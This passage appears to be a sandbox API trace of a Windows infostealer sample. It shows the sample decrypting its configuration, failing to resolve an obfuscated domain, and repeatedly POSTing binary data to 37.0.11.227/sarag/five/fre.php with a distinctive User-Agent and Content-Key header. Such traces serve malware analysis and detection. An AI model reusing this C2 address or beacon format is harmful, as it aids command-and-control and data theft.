lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x104c) returned 0x334 [0185.762] Sleep (dwMilliseconds=0xea60) [0185.764] GetProcessHeap () returned 0x690000 [0185.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0185.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.765] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0185.786] GetProcessHeap () returned 0x690000 [0185.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0185.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.789] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0185.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.790] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.791] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.791] GetProcessHeap () returned 0x690000 [0185.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0185.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.797] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0185.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.798] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0185.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.802] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0185.802] GetProcessHeap () returned 0x690000 [0185.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.804] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.805] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.807] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.808] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.808] GetProcessHeap () returned 0x690000 [0185.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.808] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.809] GetProcessHeap () returned 0x690000 [0185.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.813] GetProcessHeap () returned 0x690000 [0185.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.813] GetProcessHeap () returned 0x690000 [0185.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.814] GetProcessHeap () returned 0x690000 [0185.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.816] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0185.829] GetProcessHeap () returned 0x690000 [0185.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0185.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.830] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0185.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.833] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.834] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.834] GetProcessHeap () returned 0x690000 [0185.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0185.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.835] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.836] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0185.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.837] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0185.837] GetProcessHeap () returned 0x690000 [0185.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.838] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0185.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.839] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0185.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.840] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0185.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.841] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0185.841] GetProcessHeap () returned 0x690000 [0185.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0185.841] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0185.841] GetProcessHeap () returned 0x690000 [0185.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0185.841] socket (af=2, type=1, protocol=6) returned 0x338 [0185.842] connect (s=0x338, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0185.870] FreeAddrInfoW (pAddrInfo=0x6a9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0185.870] GetProcessHeap () returned 0x690000 [0185.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0185.870] GetProcessHeap () returned 0x690000 [0185.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0185.871] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.871] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.871] GetProcessHeap () returned 0x690000 [0185.871] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0185.871] GetProcessHeap () returned 0x690000 [0185.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.872] GetProcessHeap () returned 0x690000 [0185.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0185.872] GetProcessHeap () returned 0x690000 [0185.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0185.873] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.873] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.874] GetProcessHeap () returned 0x690000 [0185.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0185.874] GetProcessHeap () returned 0x690000 [0185.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.874] send (s=0x338, buf=0x6abd08*, len=242, flags=0) returned 242 [0185.875] send (s=0x338, buf=0x6aba40*, len=159, flags=0) returned 159 [0185.875] GetProcessHeap () returned 0x690000 [0185.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0185.875] recv (in: s=0x338, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0185.956] GetProcessHeap () returned 0x690000 [0185.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0185.957] GetProcessHeap () returned 0x690000 [0185.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.957] GetProcessHeap () returned 0x690000 [0185.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0185.958] GetProcessHeap () returned 0x690000 [0185.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0185.959] closesocket (s=0x338) returned 0 [0185.960] GetProcessHeap () returned 0x690000 [0185.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0185.960] GetProcessHeap () returned 0x690000 [0185.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.961] GetProcessHeap () returned 0x690000 [0185.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.961] GetProcessHeap () returned 0x690000 [0185.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0185.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1050) returned 0x338 [0185.964] Sleep (dwMilliseconds=0xea60) [0185.965] GetProcessHeap () returned 0x690000 [0185.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0185.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.967] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.975] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0185.982] GetProcessHeap () returned 0x690000 [0185.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0185.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.986] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.987] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.988] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.988] GetProcessHeap () returned 0x690000 [0185.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0185.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.990] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0185.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.991] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.992] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0185.992] GetProcessHeap () returned 0x690000 [0185.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0185.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.996] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.997] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.998] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.999] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.999] GetProcessHeap () returned 0x690000 [0185.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.000] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.000] GetProcessHeap () returned 0x690000 [0186.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.000] GetProcessHeap () returned 0x690000 [0186.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0186.000] GetProcessHeap () returned 0x690000 [0186.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.001] GetProcessHeap () returned 0x690000 [0186.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0186.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.002] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.008] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0186.014] GetProcessHeap () returned 0x690000 [0186.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0186.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.016] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.017] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.018] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.018] GetProcessHeap () returned 0x690000 [0186.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0186.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.020] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0186.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.021] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.022] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0186.022] GetProcessHeap () returned 0x690000 [0186.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.023] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0186.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.024] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0186.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.025] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0186.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.026] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0186.026] GetProcessHeap () returned 0x690000 [0186.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.026] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3da8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0186.027] GetProcessHeap () returned 0x690000 [0186.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0186.027] socket (af=2, type=1, protocol=6) returned 0x33c [0186.027] connect (s=0x33c, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0186.054] FreeAddrInfoW (pAddrInfo=0x6b3da8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0186.055] GetProcessHeap () returned 0x690000 [0186.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0186.055] GetProcessHeap () returned 0x690000 [0186.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0186.055] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.056] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.056] GetProcessHeap () returned 0x690000 [0186.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0186.056] GetProcessHeap () returned 0x690000 [0186.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.057] GetProcessHeap () returned 0x690000 [0186.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0186.057] GetProcessHeap () returned 0x690000 [0186.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0186.058] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.059] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.059] GetProcessHeap () returned 0x690000 [0186.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0186.059] GetProcessHeap () returned 0x690000 [0186.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.060] send (s=0x33c, buf=0x6abd08*, len=242, flags=0) returned 242 [0186.060] send (s=0x33c, buf=0x6aba40*, len=159, flags=0) returned 159 [0186.060] GetProcessHeap () returned 0x690000 [0186.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0186.060] recv (in: s=0x33c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0186.131] GetProcessHeap () returned 0x690000 [0186.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0186.133] GetProcessHeap () returned 0x690000 [0186.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0186.133] GetProcessHeap () returned 0x690000 [0186.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0186.133] GetProcessHeap () returned 0x690000 [0186.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0186.134] closesocket (s=0x33c) returned 0 [0186.134] GetProcessHeap () returned 0x690000 [0186.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0186.134] GetProcessHeap () returned 0x690000 [0186.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.135] GetProcessHeap () returned 0x690000 [0186.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.136] GetProcessHeap () returned 0x690000 [0186.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1068) returned 0x33c [0186.138] Sleep (dwMilliseconds=0xea60) [0186.140] GetProcessHeap () returned 0x690000 [0186.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.148] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0186.154] GetProcessHeap () returned 0x690000 [0186.154] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0186.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.155] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, 